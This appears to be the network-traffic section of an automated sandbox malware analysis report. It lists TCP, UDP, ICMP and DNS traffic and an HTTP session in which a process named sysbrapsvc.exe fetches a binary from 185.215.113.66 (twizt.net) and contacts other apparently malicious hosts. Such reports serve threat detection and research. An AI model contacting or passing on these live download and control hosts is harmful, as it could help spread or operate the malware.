                                                                              May 8, 2024 15:25:39.483880997 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.484021902 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.677966118 CEST8049792185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.677988052 CEST8049792185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.678083897 CEST4979280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.678095102 CEST8049792185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.678160906 CEST4979280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.678167105 CEST8049792185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.678183079 CEST8049792185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.678198099 CEST8049792185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.678201914 CEST4979280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.678224087 CEST4979280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.678244114 CEST4979280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.678260088 CEST8049792185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.678298950 CEST4979280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.678329945 CEST8049792185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.678368092 CEST4979280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.678381920 CEST8049792185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.678423882 CEST4979280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.678901911 CEST4979280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.678937912 CEST4979280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.822312117 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.822788954 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.822804928 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.822870016 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.822957039 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.822978020 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.823024988 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823054075 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823371887 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.823386908 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.823412895 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823434114 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823673964 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823708057 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823712111 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.823726892 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.823751926 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823775053 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823790073 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.823805094 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.823823929 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823844910 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:41.327995062 CEST804977791.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:41.328058004 CEST4977780192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:42.716382027 CEST4977780192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:42.716691971 CEST4979480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:42.857667923 CEST4979580192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:43.061362982 CEST804977791.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:43.063154936 CEST804979491.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:43.063225031 CEST4979480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:43.063368082 CEST4979480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:43.202824116 CEST804979591.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:43.202918053 CEST4979580192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:43.203051090 CEST4979580192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:43.411587954 CEST804979491.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:43.412086964 CEST804979491.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:43.412163019 CEST4979480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:43.547919989 CEST804979591.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:43.548258066 CEST804979591.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:43.548360109 CEST4979580192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:45.434943914 CEST4979480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:45.576303005 CEST4979580192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:45.576699972 CEST4979680192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:45.781805038 CEST804979491.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:45.781867027 CEST4979480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:45.921127081 CEST804979591.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:45.921211958 CEST4979580192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:45.926316023 CEST804979691.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:45.926405907 CEST4979680192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:45.926543951 CEST4979680192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:46.276807070 CEST804979691.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:46.277040005 CEST804979691.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:46.277164936 CEST4979680192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:47.810445070 CEST4979480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:48.156766891 CEST804979491.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:48.156882048 CEST4979480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:48.311369896 CEST4979680192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:48.311671019 CEST4979780192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:48.660558939 CEST804979691.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:48.660645962 CEST4979680192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:48.666532993 CEST804979791.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:48.666672945 CEST4979780192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:48.666867971 CEST4979780192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:48.900365114 CEST4979840500192.168.2.888.204.241.110
                                                                              May 8, 2024 15:25:49.024485111 CEST804979791.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:49.024565935 CEST804979791.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:49.024642944 CEST4979780192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:49.902575016 CEST4979840500192.168.2.888.204.241.110
                                                                              May 8, 2024 15:25:51.217668056 CEST4979980192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:25:51.217803001 CEST4979780192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:51.218004942 CEST4980080192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:51.563277006 CEST804980091.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:51.563431025 CEST4980080192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:51.563631058 CEST4980080192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:51.570775032 CEST8049799193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:25:51.572272062 CEST804979791.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:51.572395086 CEST4979780192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:51.909006119 CEST804980091.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:51.909209013 CEST804980091.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:51.909300089 CEST4980080192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:52.012219906 CEST4979840500192.168.2.888.204.241.110
                                                                              May 8, 2024 15:25:52.076541901 CEST4979980192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:25:52.429670095 CEST8049799193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:25:52.933765888 CEST4979980192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:25:53.288975000 CEST8049799193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:25:53.793339014 CEST4979980192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:25:53.935472012 CEST4980080192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:53.935822964 CEST4980180192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:54.148015022 CEST8049799193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:25:54.280884027 CEST804980091.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:54.282645941 CEST4980080192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:54.287169933 CEST804980191.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:54.290606022 CEST4980180192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:54.290774107 CEST4980180192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:54.642321110 CEST804980191.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:54.642417908 CEST804980191.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:54.642558098 CEST4980180192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:54.652534962 CEST4979980192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:25:55.005399942 CEST8049799193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:25:56.027555943 CEST4979840500192.168.2.888.204.241.110
                                                                              May 8, 2024 15:25:56.669929028 CEST4980180192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:56.670205116 CEST4980280192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:57.026108027 CEST804980191.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:57.026196003 CEST4980180192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:57.027179003 CEST804980291.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:57.027302027 CEST4980280192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:57.027489901 CEST4980280192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:57.029340982 CEST4980380192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:25:57.380206108 CEST804980291.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:57.380295992 CEST804980291.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:57.380425930 CEST4980280192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:57.382529974 CEST8049803193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:25:57.918157101 CEST4980380192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:25:58.271414995 CEST8049803193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:25:58.777549028 CEST4980380192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:25:59.130918980 CEST8049803193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:25:59.636882067 CEST4980380192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:25:59.990106106 CEST8049803193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:00.420448065 CEST4980480192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:00.496408939 CEST4980380192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:00.772665977 CEST8049804193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:00.849531889 CEST8049803193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:01.277579069 CEST4980480192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:01.626549959 CEST8049804193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:02.136946917 CEST4980480192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:02.487306118 CEST8049804193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:02.873296976 CEST4980580192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:02.996331930 CEST4980480192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:03.223018885 CEST8049805193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:03.347361088 CEST8049804193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:03.730665922 CEST4980580192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:03.855777025 CEST4980480192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:04.043292046 CEST4979840500192.168.2.888.204.241.110
                                                                              May 8, 2024 15:26:04.080791950 CEST8049805193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:04.205101013 CEST8049804193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:04.590050936 CEST4980580192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:04.939845085 CEST8049805193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:05.449387074 CEST4980580192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:05.799149990 CEST8049805193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:06.233151913 CEST4980680192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:06.308906078 CEST4980580192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:06.583261013 CEST8049806193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:06.658628941 CEST8049805193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:07.090117931 CEST4980680192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:07.441028118 CEST8049806193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:07.949453115 CEST4980680192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:08.299576044 CEST8049806193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:08.808756113 CEST4980680192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:09.163947105 CEST8049806193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:09.668188095 CEST4980680192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:09.811280966 CEST4980780192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:10.018567085 CEST8049806193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:10.154156923 CEST8049807185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:10.156699896 CEST4980780192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:10.156857967 CEST4980780192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:10.496879101 CEST8049807185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:10.497107029 CEST8049807185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:10.497241974 CEST8049807185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:10.497313976 CEST4980780192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:10.497333050 CEST8049807185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:10.497349024 CEST8049807185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:10.497396946 CEST4980780192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:10.497562885 CEST8049807185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:10.497608900 CEST8049807185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:10.497654915 CEST4980780192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:10.498065948 CEST4980780192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:10.498089075 CEST4980780192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:10.498331070 CEST8049807185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:10.498344898 CEST8049807185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:10.498383045 CEST4980780192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:10.498402119 CEST4980780192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:12.047370911 CEST4980880192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:12.401315928 CEST8049808193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:12.530006886 CEST4980980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:12.867367029 CEST8049809185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:12.870595932 CEST4980980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:12.870759010 CEST4980980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:12.902508974 CEST4980880192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:13.211340904 CEST8049809185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:13.211987972 CEST8049809185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:13.212258101 CEST8049809185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:13.212305069 CEST8049809185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:13.212373972 CEST8049809185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:13.212457895 CEST4980980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:13.212457895 CEST4980980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:13.212457895 CEST4980980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:13.212554932 CEST8049809185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:13.212584019 CEST8049809185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:13.212657928 CEST8049809185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:13.212678909 CEST8049809185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:13.212703943 CEST4980980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:13.212729931 CEST4980980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:13.256287098 CEST8049808193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:13.385663033 CEST4980980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:13.385704994 CEST4980980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:13.761918068 CEST4980880192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:14.115581036 CEST8049808193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:14.652628899 CEST4980880192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:15.008029938 CEST8049808193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:15.043973923 CEST4981040500192.168.2.8187.250.131.80
                                                                              May 8, 2024 15:26:15.404361010 CEST4981180192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:15.652755976 CEST4980880192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:26:15.744654894 CEST8049811185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:26:15.744741917 CEST4981180192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:26:16.006516933 CEST8049808193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:26:16.184322119 CEST4981040500192.168.2.8187.250.131.80
                                                                              May 8, 2024 15:26:18.157546043 CEST804979491.202.233.141192.168.2.8
                                                                              May 8, 2024 15:26:18.157613993 CEST4979480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:26:18.199372053 CEST4981040500192.168.2.8187.250.131.80
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              May 8, 2024 15:22:19.966809034 CEST5310040500192.168.2.810.102.10.21
                                                                              May 8, 2024 15:22:25.401623011 CEST5310040500192.168.2.810.102.10.21
                                                                              May 8, 2024 15:22:30.416734934 CEST5310040500192.168.2.8189.222.182.86
                                                                              May 8, 2024 15:22:35.420978069 CEST5310040500192.168.2.82.133.220.58
                                                                              May 8, 2024 15:22:40.436269999 CEST5310040500192.168.2.8100.82.121.252
                                                                              May 8, 2024 15:22:45.451795101 CEST5310040500192.168.2.892.124.152.236
                                                                              May 8, 2024 15:22:50.451420069 CEST5310040500192.168.2.893.123.145.179
                                                                              May 8, 2024 15:22:55.451896906 CEST5310040500192.168.2.889.236.218.241
                                                                              May 8, 2024 15:22:59.261123896 CEST5859053192.168.2.81.1.1.1
                                                                              May 8, 2024 15:22:59.424319029 CEST53585901.1.1.1192.168.2.8
                                                                              May 8, 2024 15:22:59.431577921 CEST5123453192.168.2.81.1.1.1
                                                                              May 8, 2024 15:22:59.595222950 CEST53512341.1.1.1192.168.2.8
                                                                              May 8, 2024 15:23:00.526493073 CEST5310040500192.168.2.889.218.238.106
                                                                              May 8, 2024 15:23:05.526587963 CEST5310040500192.168.2.885.204.86.26
                                                                              May 8, 2024 15:23:07.693244934 CEST6133053192.168.2.81.1.1.1
                                                                              May 8, 2024 15:23:07.862080097 CEST53613301.1.1.1192.168.2.8
                                                                              May 8, 2024 15:23:10.514270067 CEST5310040500192.168.2.889.236.219.106
                                                                              May 8, 2024 15:23:15.532761097 CEST5310040500192.168.2.837.120.247.6
                                                                              May 8, 2024 15:23:20.531721115 CEST5310040500192.168.2.892.47.124.54
                                                                              May 8, 2024 15:23:25.545392036 CEST5310040500192.168.2.8102.130.192.212
                                                                              May 8, 2024 15:23:30.560770035 CEST5310040500192.168.2.891.92.206.184
                                                                              May 8, 2024 15:23:35.561279058 CEST5310040500192.168.2.8109.168.235.213
                                                                              May 8, 2024 15:23:40.576210022 CEST5310040500192.168.2.8187.235.148.47
                                                                              May 8, 2024 15:23:45.576159000 CEST5310040500192.168.2.8187.133.57.73
                                                                              May 8, 2024 15:23:50.576286077 CEST5310040500192.168.2.877.240.41.3
                                                                              May 8, 2024 15:23:55.592483044 CEST5310040500192.168.2.888.135.33.186
                                                                              May 8, 2024 15:24:00.592612028 CEST5310040500192.168.2.894.141.69.176
                                                                              May 8, 2024 15:24:05.596669912 CEST5310040500192.168.2.8189.186.73.73
                                                                              May 8, 2024 15:24:10.610780954 CEST5310040500192.168.2.889.219.223.67
                                                                              May 8, 2024 15:24:15.607469082 CEST5310040500192.168.2.887.237.239.65
                                                                              May 8, 2024 15:24:20.623168945 CEST5310040500192.168.2.82.191.74.251
                                                                              May 8, 2024 15:24:25.761945009 CEST5310040500192.168.2.892.47.251.85
                                                                              May 8, 2024 15:24:30.766488075 CEST5310040500192.168.2.889.218.238.106
                                                                              May 8, 2024 15:24:35.822434902 CEST5310040500192.168.2.882.200.224.194
                                                                              May 8, 2024 15:24:40.827235937 CEST5310040500192.168.2.895.156.103.50
                                                                              May 8, 2024 15:24:45.826837063 CEST5310040500192.168.2.880.80.214.50
                                                                              May 8, 2024 15:24:50.841681957 CEST5310040500192.168.2.882.194.10.40
                                                                              May 8, 2024 15:24:55.842050076 CEST5310040500192.168.2.82.180.211.255
                                                                              May 8, 2024 15:25:00.845896959 CEST5310040500192.168.2.8186.94.185.219
                                                                              May 8, 2024 15:25:05.857201099 CEST5310040500192.168.2.85.255.18.13
                                                                              May 8, 2024 15:25:10.873131990 CEST5310040500192.168.2.82.190.51.122
                                                                              May 8, 2024 15:25:16.364409924 CEST5310040500192.168.2.8217.164.211.207
                                                                              May 8, 2024 15:25:21.361872911 CEST5310040500192.168.2.841.199.184.238
                                                                              May 8, 2024 15:25:26.373049021 CEST5310040500192.168.2.85.235.233.254
                                                                              May 8, 2024 15:25:31.375852108 CEST5310040500192.168.2.85.219.253.209
                                                                              May 8, 2024 15:25:36.373022079 CEST5310040500192.168.2.889.106.236.58
                                                                              May 8, 2024 15:25:41.388560057 CEST5310040500192.168.2.8100.111.103.217
                                                                              May 8, 2024 15:25:46.388922930 CEST5310040500192.168.2.889.249.62.87
                                                                              May 8, 2024 15:25:51.404406071 CEST5310040500192.168.2.8109.168.235.213
                                                                              May 8, 2024 15:25:56.422772884 CEST5310040500192.168.2.82.185.146.181
                                                                              May 8, 2024 15:26:01.437855005 CEST5310040500192.168.2.8146.70.53.161
                                                                              May 8, 2024 15:26:06.451778889 CEST5310040500192.168.2.884.53.244.106
                                                                              May 8, 2024 15:26:11.466891050 CEST5310040500192.168.2.8190.36.195.147
                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                              May 8, 2024 15:23:12.553208113 CEST212.154.184.158192.168.2.84d0f(Host unreachable)Destination Unreachable
                                                                              May 8, 2024 15:23:15.862824917 CEST212.154.184.158192.168.2.84d0f(Host unreachable)Destination Unreachable
                                                                              May 8, 2024 15:23:15.862845898 CEST212.154.184.158192.168.2.84d0f(Host unreachable)Destination Unreachable
                                                                              May 8, 2024 15:23:22.132114887 CEST212.154.184.158192.168.2.84d0f(Host unreachable)Destination Unreachable
                                                                              May 8, 2024 15:23:28.804625034 CEST212.154.184.158192.168.2.84d0f(Host unreachable)Destination Unreachable
                                                                              May 8, 2024 15:23:35.924915075 CEST109.168.235.213192.168.2.81969(Port unreachable)Destination Unreachable
                                                                              May 8, 2024 15:25:51.768331051 CEST109.168.235.213192.168.2.81969(Port unreachable)Destination Unreachable
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              May 8, 2024 15:22:59.261123896 CEST192.168.2.81.1.1.10x1416Standard query (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                              May 8, 2024 15:22:59.431577921 CEST192.168.2.81.1.1.10xc317Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                              May 8, 2024 15:23:07.693244934 CEST192.168.2.81.1.1.10x5b49Standard query (0)twizt.netA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              May 8, 2024 15:22:59.424319029 CEST1.1.1.1192.168.2.80x1416No error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                              May 8, 2024 15:22:59.424319029 CEST1.1.1.1192.168.2.80x1416No error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                              May 8, 2024 15:22:59.424319029 CEST1.1.1.1192.168.2.80x1416No error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                              May 8, 2024 15:22:59.595222950 CEST1.1.1.1192.168.2.80xc317No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                              May 8, 2024 15:22:59.595222950 CEST1.1.1.1192.168.2.80xc317No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                              May 8, 2024 15:22:59.595222950 CEST1.1.1.1192.168.2.80xc317No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                              May 8, 2024 15:22:59.595222950 CEST1.1.1.1192.168.2.80xc317No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                              May 8, 2024 15:22:59.595222950 CEST1.1.1.1192.168.2.80xc317No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                              May 8, 2024 15:22:59.595222950 CEST1.1.1.1192.168.2.80xc317No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                              May 8, 2024 15:22:59.595222950 CEST1.1.1.1192.168.2.80xc317No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                              May 8, 2024 15:22:59.595222950 CEST1.1.1.1192.168.2.80xc317No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                              May 8, 2024 15:23:07.862080097 CEST1.1.1.1192.168.2.80x5b49No error (0)twizt.net185.215.113.66A (IP address)IN (0x0001)false
                                                                              • 185.215.113.66
                                                                              • twizt.net
                                                                              • 91.202.233.141
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.849708185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:22:19.785147905 CEST166OUTGET /1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:22:20.126646996 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:22:19 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 101120
                                                                              Last-Modified: Mon, 06 May 2024 15:20:46 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6638f54e-18b00"
                                                                              Accept-Ranges: bytes
